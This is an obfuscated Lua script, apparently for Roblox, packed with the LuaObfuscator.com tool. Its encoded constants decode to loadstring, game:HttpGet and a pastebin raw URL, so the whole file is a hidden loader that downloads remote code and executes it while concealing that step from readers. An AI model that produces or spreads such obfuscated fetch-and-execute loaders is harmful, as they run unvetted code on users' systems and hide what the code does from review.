--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v121=v5(v88,v19);v19=nil;return v121;else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(878 -(282 + 595)))))%(2^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v89-(v89%((237 + 829) -(68 + 997))) ;else local v90=1270 -(226 + (2001 -(892 + 65))) ;local v91;while true do if (v90==(619 -(555 + (152 -88)))) then v91=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v91 + v91))>=v91) and (928 -(214 + 713))) or (0 + (0 -0)) ;end end end end local function v21() local v34=180 -(67 + 113) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==((952 -(802 + 150)) -0)) then v35=v1(v16,v18,v18);v18=v18 + ((2 -1) -0) ;v34=351 -(87 + 263) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 ;return (v37 * (187 + 69)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (1000 -(915 + 82)) );v18=v18 + 4 ;return (v41 * 16777216) + (v40 * (185570 -120034)) + (v39 * (150 + 106)) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1190 -(1069 + 118))) then if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * (0 -0) ;else local v122=0;while true do if (v122==((859 -(814 + 45)) + 0)) then v47=1 -0 ;v45=0 + 0 ;break;end end end elseif (v47==(2838 -(368 + 423))) then return ((v46==0) and (v48 * (1/0))) or (v48 * NaN) ;end return v8(v48,v47-(3214 -2191) ) * (v45 + (v46/((20 -(10 + 8))^(199 -147)))) ;end if (v42==(442 -(416 + 26))) then v43=v23();v44=v23();v42=3 -2 ;end if (v42==(1 + 1)) then v47=v20(v44,36 -15 ,469 -(145 + 293) );v48=((v20(v44,32)==1) and  -(431 -(44 + 386))) or (1487 -((2458 -1460) + 488)) ;v42=1 + 2 ;end if (v42==(1 + 0)) then v45=1 + 0 ;v46=(v20(v44,(274 + 499) -((1086 -(261 + 624)) + 571) ,1158 -(116 + 1022) ) * ((8 -6)^(19 + 13))) + v43 ;v42=7 -5 ;end end end local function v25(v49) local v50=1747 -(760 + 987) ;local v51;local v52;while true do if (v50==(1915 -(1789 + (1179 -(87 + 968))))) then v52={};for v108=1 -(0 -0) , #v51 do v52[v108]=v2(v1(v3(v51,v108,v108)));end v50=1083 -(1020 + 60) ;end if (v50==0) then v51=nil;if  not v49 then local v114=1423 -(630 + 793) ;while true do if (v114==((0 + 0) -0)) then v49=v23();if (v49==(0 -(0 -0))) then return "";end break;end end end v50=3 -2 ;end if (v50==(1 + (1413 -(447 + 966)))) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=2;end if (v50==(9 -6)) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v92~= #"]") then else if (v93== #"~") then v94=(function() return v95()~=(0 + 0) ;end)();elseif (v93==2) then v94=(function() return v96();end)();elseif (v93== #"asd") then v94=(function() return v97();end)();end v98[v99]=(function() return v94;end)();break;end if ((396 -(115 + 281))==v92) then local v116=(function() return 0;end)();while true do if (v116==0) then v93=(function() return v95();end)();v94=(function() return nil;end)();v116=(function() return 1;end)();end if (v116==(2 -1)) then v92=(function() return  #"{";end)();break;end end end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v54=(function() return function(v100,v101,v102) local v103=(function() return 0 + 0 ;end)();local v104=(function() return;end)();while true do if (v103==(0 -0)) then v104=(function() return 0 -0 ;end)();while true do if (v104==0) then v100[v101-#"/" ]=(function() return v102();end)();return v100,v101,v102;end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #" ",v59 do FlatIdent_31905,Type,Cons,v21,v24,v25,v60,v68=(function() return v53(FlatIdent_31905,Type,Cons,v21,v24,v25,v60,v68);end)();end v58[ #"xnx"]=(function() return v21();end)();for v69= #"[",v23() do local v70=(function() return 0;end)();local v71=(function() return;end)();while true do if (v70~=0) then else v71=(function() return v21();end)();if (v20(v71, #"[", #"{")==0) then local v117=(function() return 867 -(550 + 317) ;end)();local v118=(function() return;end)();local v119=(function() return;end)();local v120=(function() return;end)();while true do if (v117~=(2 -0)) then else if (v20(v119, #">", #":")== #".") then v120[2]=(function() return v60[v120[2]];end)();end if (v20(v119,2,2 -0 )== #"!") then v120[ #"nil"]=(function() return v60[v120[ #"91("]];end)();end v117=(function() return 8 -5 ;end)();end if (v117==(288 -(134 + 151))) then if (v20(v119, #"gha", #"91(")== #"|") then v120[ #".com"]=(function() return v60[v120[ #"asd1"]];end)();end v55[v69]=(function() return v120;end)();break;end if (v117~=(1666 -(970 + 695))) then else local v132=(function() return 0;end)();while true do if (v132~=(0 -0)) then else v120=(function() return {v22(),v22(),nil,nil};end)();if (v118==(1990 -(582 + 1408))) then local v171=(function() return 0 -0 ;end)();while true do if (v171~=0) then else v120[ #"asd"]=(function() return v22();end)();v120[ #"asd1"]=(function() return v22();end)();break;end end elseif (v118== #"}") then v120[ #"gha"]=(function() return v23();end)();elseif (v118==(2 -0)) then v120[ #"xxx"]=(function() return v23() -(2^(60 -44)) ;end)();elseif (v118~= #"xnx") then else local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182~=(1824 -(1195 + 629))) then else v183=(function() return 0;end)();while true do if (v183==0) then v120[ #"gha"]=(function() return v23() -((2 -0)^16) ;end)();v120[ #"http"]=(function() return v22();end)();break;end end break;end end end v132=(function() return 242 -(187 + 54) ;end)();end if (v132==1) then v117=(function() return 2;end)();break;end end end if (0==v117) then local v133=(function() return 780 -(162 + 618) ;end)();while true do if (v133==(1 + 0)) then v117=(function() return 1;end)();break;end if (v133~=0) then else v118=(function() return v20(v71,2, #"nil");end)();v119=(function() return v20(v71, #"0313",6);end)();v133=(function() return 1 + 0 ;end)();end end end end end break;end end end for v72= #"<",v23() do v56,v72,v28=(function() return v54(v56,v72,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 -(0 -0) ];local v66=v62[2 -(1975 -(1913 + 62)) ];local v67=v62[1 + 2 ];return function(...) local v73=v65;local v74=v66;local v75=v67;local v76=v27;local v77=1637 -(1373 + 263) ;local v78= -(1001 -(451 + 549));local v79={};local v80={...};local v81=v12("#",...) -(1 + 0) ;local v82={};local v83={};for v105=0 -0 ,v81 do if (v105>=v75) then v79[v105-v75 ]=v80[v105 + (2 -1) ];else v83[v105]=v80[v105 + 1 + 0 + 0 ];end end local v84=(v81-v75) + (1 -0) ;local v85;local v86;while true do v85=v73[v77];v86=v85[1 -0 ];if ((v86<=(19 -13)) or (142>=4749)) then if (v86<=(2 + 0)) then if (v86<=(1384 -((1974 -1228) + 638))) then v83[v85[1 + 1 ]]=v64[v85[4 -1 ]];elseif ((3926<=4134) and (v86==(342 -(218 + 123)))) then v83[v85[1583 -(1535 + 46) ]]=v85[3 + 0 ];else v83[v85[1 + 1 ]]();end elseif (v86<=((1068 -504) -((544 -(64 + 174)) + 254))) then if (v86>(583 -((2294 -(565 + 1368)) + 219))) then v83[v85[(46 + 276) -((199 -146) + 267) ]]=v85[1 + 2 ];else v83[v85[3 -1 ]]();end elseif ((v86>((3133 -(1477 + 184)) -(899 + 568))) or (525==2109)) then local v138=0 + 0 ;local v139;while true do if ((33==33) and (v138==(0 -0))) then v139=v85[605 -(268 + 335) ];v83[v139]=v83[v139](v13(v83,v139 + (291 -(60 + (313 -83))) ,v78));break;end end else local v140=(0 -0) + 0 ;local v141;local v142;local v143;local v144;while true do if ((3054<=4015) and ((850 -(20 + 830))==v140)) then v141=v85[(338 -(144 + 192)) + 0 ];v142,v143=v76(v83[v141](v13(v83,v141 + (573 -(426 + 146)) ,v85[1 + 2 ])));v140=1457 -(282 + 1094 + 80) ;end if ((1871<3382) and (((1029 -(42 + 174)) -(569 + 242))==v140)) then for v172=v141,v78 do local v173=0 -0 ;while true do if ((1293<=2166) and (v173==(0 + 0))) then v144=v144 + 1 + 0 ;v83[v172]=v142[v144];break;end end end break;end if ((v140==(1 + 0)) or (2579<123)) then v78=(v143 + v141) -(1025 -(706 + 318)) ;v144=1251 -(721 + 530) ;v140=858 -(564 + 292) ;end end end elseif ((v86<=(1280 -(710 + 235 + 326))) or (164>=2785)) then if ((v86<=(16 -9)) or (846>=2368)) then local v126=0 + 0 ;local v127;local v128;local v129;local v130;while true do if (v126==(701 -((467 -196) + 429))) then v78=(v129 + v127) -(1 + 0) ;v130=1500 -(1167 + 241 + 92) ;v126=(3279 -2191) -(461 + 625) ;end if (v126==(1288 -(993 + 295))) then v127=v85[2];v128,v129=v76(v83[v127](v13(v83,v127 + 1 + 0 ,v85[1174 -(418 + 753) ])));v126=1 + 0 ;end if ((v126==(1 + 1)) or (4012<=3358)) then for v161=v127,v78 do local v162=0 + 0 ;while true do if ((1494<=3005) and (v162==(0 + 0))) then v130=v130 + (305 -(244 + 60)) + 0 + 0 ;v83[v161]=v128[v130];break;end end end break;end end elseif (v86>(3 + 5)) then local v145=v85[478 -(41 + 435) ];v83[v145]=v83[v145](v13(v83,v145 + ((1531 -(938 + 63)) -(406 + 123)) ,v78));else do return;end end elseif (v86<=(1780 -(1749 + 20))) then if (v86==(6 + 4 + 0)) then local v147=v85[1 + (1126 -(936 + 189)) ];local v148=v83[v85[1325 -(1249 + 73) ]];v83[v147 + (2 -1) ]=v148;v83[v147]=v148[v85[2 + (1506 -(363 + 1141)) ]];else v83[v85[(1614 -(1565 + 48)) + 1 + 0 ]]=v64[v85[1148 -(466 + 679) ]];end elseif (v86==((2345 -(1183 + 397)) -((1377 -(782 + 356)) + (1564 -1050)))) then local v154=(267 -(176 + 91)) + 0 ;local v155;local v156;while true do if (v154==(2 -1)) then v83[v155 + 1 + 0 ]=v156;v83[v155]=v156[v85[11 -(6 + 1) ]];break;end if (v154==(1900 -(106 + 1794))) then v155=v85[1 + 1 ];v156=v83[v85[(2 -1) + 2 ]];v154=2 -1 ;end end else do return;end end v77=v77 + (2 -(1 + 0)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F5A41696E56554A7600083Q00120B3Q00013Q00120B000100023Q00200A000100010003001201000300044Q0007000100034Q00095Q00022Q00033Q000100012Q00083Q00017Q00",v9(),...);
